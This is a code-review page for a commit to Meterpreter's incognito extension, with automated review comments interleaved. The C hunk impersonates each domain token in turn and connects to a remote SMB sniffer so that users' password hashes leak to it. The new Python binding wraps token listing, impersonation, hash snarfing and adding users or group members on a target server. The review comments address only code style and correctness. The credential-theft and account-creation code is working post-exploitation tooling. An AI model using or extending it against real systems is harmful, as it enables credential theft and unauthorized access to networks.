Add incognito binding, code tidies
parent
cbb50227a5
commit
e016e6d526
37
c/meterpreter/source/extensions/incognito/hash_stealer.c
Normal file → Executable file
37
c/meterpreter/source/extensions/incognito/hash_stealer.c
Normal file → Executable file
@ -48,26 +48,29 @@ DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet)
|
||||
}
|
||||
|
||||
// Use every token and get hashes by connecting to SMB sniffer
|
||||
for (i=0;i<num_tokens;i++)
|
||||
if (token_list[i].token)
|
||||
for (i = 0; i < num_tokens; i++)
|
||||
{
|
||||
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
|
||||
// If token is not "useless" local account connect to sniffer
|
||||
if (_stricmp(domain_name, "NT AUTHORITY"))
|
||||
if (token_list[i].token)
|
||||
{
|
||||
// Impersonate token
|
||||
ImpersonateLoggedOnUser(token_list[i].token);
|
||||
|
||||
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
|
||||
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
|
||||
|
||||
// Connect to smb sniffer
|
||||
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
|
||||
get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE);
|
||||
// If token is not "useless" local account connect to sniffer
|
||||
if (_stricmp(domain_name, "NT AUTHORITY"))
|
||||
{
|
||||
// Impersonate token
|
||||
ImpersonateLoggedOnUser(token_list[i].token);
|
||||
|
||||
// Revert to primary token
|
||||
RevertToSelf();
|
||||
// Cancel previous connection to ensure hashes are sent and existing connection isn't reused
|
||||
WNetCancelConnection2A(nr.lpRemoteName, 0, TRUE);
|
||||
|
||||
// Connect to smb sniffer
|
||||
if (!WNetAddConnection2A(&nr, NULL, NULL, 0))
|
||||
{
|
||||
// Revert to primary token
|
||||
RevertToSelf();
|
||||
}
|
||||
}
|
||||
CloseHandle(token_list[i].token);
|
||||
}
|
||||
CloseHandle(token_list[i].token);
|
||||
}
|
||||
|
||||
packet_transmit_response(ERROR_SUCCESS, remote, response);
|
||||
@ -77,7 +80,9 @@ cleanup:
|
||||
|
||||
// Restore token impersonation
|
||||
if (saved_token != INVALID_HANDLE_VALUE)
|
||||
{
|
||||
ImpersonateLoggedOnUser(saved_token);
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
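Review bot: On the new side, `RevertToSelf()` is reached only inside `if (!WNetAddConnection2A(&nr, NULL, NULL, 0))`, so when the connection attempt fails the thread keeps impersonating that token into the next iteration and, after the last one, into the `cleanup:` path, which restores the caller's identity only when `saved_token != INVALID_HANDLE_VALUE`; every later request served on that thread then runs under the wrong identity. Since the connection result is not otherwise used, the revert should be unconditional: `WNetAddConnection2A(&nr, NULL, NULL, 0);` followed by `RevertToSelf();`. The return value of `ImpersonateLoggedOnUser` is also unchecked, so a failed impersonation silently continues under the current thread token; guarding with `if (ImpersonateLoggedOnUser(token_list[i].token))` would make that explicit. The enclosing request_incognito_snarf_hashes starts above the first hunk, and the old/new side of the reindented lines is read from the rendered section rather than explicit markers, so the placement should be confirmed against the source.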
|
@ -1,2 +1,2 @@
|
||||
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi']
|
||||
__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito']
|
||||
|
||||
|
@ -0,0 +1,77 @@
|
||||
import meterpreter_bindings
|
||||
|
||||
from meterpreter.core import *
|
||||
from meterpreter.tlv import *
|
||||
|
||||
INCOGNITO_NO_TOKENS = 'No tokens available\n'
|
||||
|
||||
def list_user_tokens():
|
||||
return __list_tokens_internal(0)
|
||||
|
||||
def list_group_tokens():
|
||||
return __list_tokens_internal(1)
|
||||
|
||||
def __list_tokens_internal(order):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER, order)
|
||||
resp = invoke_meterpreter('incognito_list_tokens', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return None
|
||||
|
||||
if packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] != 0:
|
||||
return None
|
||||
|
||||
delegation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION)['value']
|
||||
impersonation = packet_get_tlv(resp, TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)['value']
|
||||
return {
|
||||
'Impersonation': impersonation.strip().split('\n') if impersonation != INCOGNITO_NO_TOKENS else [],
|
||||
'Delegation': delegation.strip().split('\n') if delegation != INCOGNITO_NO_TOKENS else []
|
||||
}
|
||||
|
||||
def impersonate(user):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, user)
|
||||
resp = invoke_meterpreter('incognito_impersonate_token', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
|
||||
|
||||
def snarf_hashes(server):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
|
||||
resp = invoke_meterpreter('incognito_snarf_hashes', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
|
||||
|
||||
def add_user(server, username, password):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_PASSWORD, password)
|
||||
|
||||
resp = invoke_meterpreter('incognito_add_user', True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
|
||||
|
||||
def add_group_user(server, group, username):
|
||||
return __add_group_user_internal('incognito_add_group_user', server, group, username)
|
||||
|
||||
def add_localgroup_user(server, group, username):
|
||||
return __add_group_user_internal('incognito_add_localgroup_user', server, group, username)
|
||||
|
||||
def __add_group_user_internal(msg, server, group, username):
|
||||
tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
|
||||
tlv += tlv_pack(TLV_TYPE_INCOGNITO_GROUPNAME, group)
|
||||
|
||||
resp = invoke_meterpreter(msg, True, tlv)
|
||||
|
||||
if resp == None:
|
||||
return False
|
||||
|
||||
return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
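Review bot: `if resp == None:` appears in `__list_tokens_internal`, `impersonate`, `snarf_hashes`, `add_user` and `__add_group_user_internal`; a comparison with `None` should use identity, `if resp is None:`. The two helpers carry a double leading underscore at module level, where no name mangling applies, so the conventional private marker is a single underscore (`_list_tokens_internal`, `_add_group_user_internal`). The failure contract is inconsistent and undocumented: `list_user_tokens`/`list_group_tokens` return `None` when the response is missing or `TLV_TYPE_RESULT` is non-zero, while the other public functions return `False`; a one-line docstring on each public function stating what it returns on a failed or missing response would help callers. Note too that an empty `impersonation` or `delegation` string that is not exactly `INCOGNITO_NO_TOKENS` yields `['']` rather than `[]` from `.strip().split('\n')`.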
|
@ -1,8 +1,9 @@
|
||||
from meterpreter.core import *
|
||||
|
||||
TLV_STDAPI_EXTENSION = 0
|
||||
TLV_PRIV_EXTENSION = 20000
|
||||
TLV_KIWI_EXTENSION = 20000
|
||||
TLV_STDAPI_EXTENSION = 0
|
||||
TLV_INCOGNITO_EXTENSION = 20000
|
||||
TLV_PRIV_EXTENSION = 20000
|
||||
TLV_KIWI_EXTENSION = 20000
|
||||
|
||||
# Stdapi constants
|
||||
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | (TLV_STDAPI_EXTENSION + 1040)
|
||||
@ -45,4 +46,14 @@ TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_KIWI_EXTENSION +
|
||||
TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 8)
|
||||
TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_KIWI_EXTENSION + 9)
|
||||
|
||||
# Incognito constants
|
||||
TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 2)
|
||||
TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 3)
|
||||
TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER = TLV_META_TYPE_UINT | (TLV_INCOGNITO_EXTENSION + 4)
|
||||
TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 5)
|
||||
TLV_TYPE_INCOGNITO_GENERIC_RESPONSE = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 6)
|
||||
TLV_TYPE_INCOGNITO_USERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 7)
|
||||
TLV_TYPE_INCOGNITO_PASSWORD = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 8)
|
||||
TLV_TYPE_INCOGNITO_SERVERNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 9)
|
||||
TLV_TYPE_INCOGNITO_GROUPNAME = TLV_META_TYPE_STRING | (TLV_INCOGNITO_EXTENSION + 10)
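Review bot: `TLV_INCOGNITO_EXTENSION = 20000` uses the same base as `TLV_PRIV_EXTENSION` and `TLV_KIWI_EXTENSION`, so several of the new constants are numerically identical to existing ones: `TLV_TYPE_INCOGNITO_PASSWORD` (`+ 8`, STRING) equals `TLV_TYPE_KIWI_PWD_LMHASH`, and `TLV_TYPE_INCOGNITO_SERVERNAME` (`+ 9`, STRING) equals `TLV_TYPE_KIWI_PWD_NTLMHASH`. If TLV ids are only ever interpreted in the context of the command that produced the packet this is harmless, but `packet_get_tlv` is called with these constants directly on each response, so a comment stating the scoping rule would make the intent explicit, e.g. `# Extension TLV bases deliberately overlap (20000): ids are only unique within one extension's commands — TODO confirm`. Whether that holds for every response these constants are read from cannot be told from this hunk.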
|
||||
|
||||
|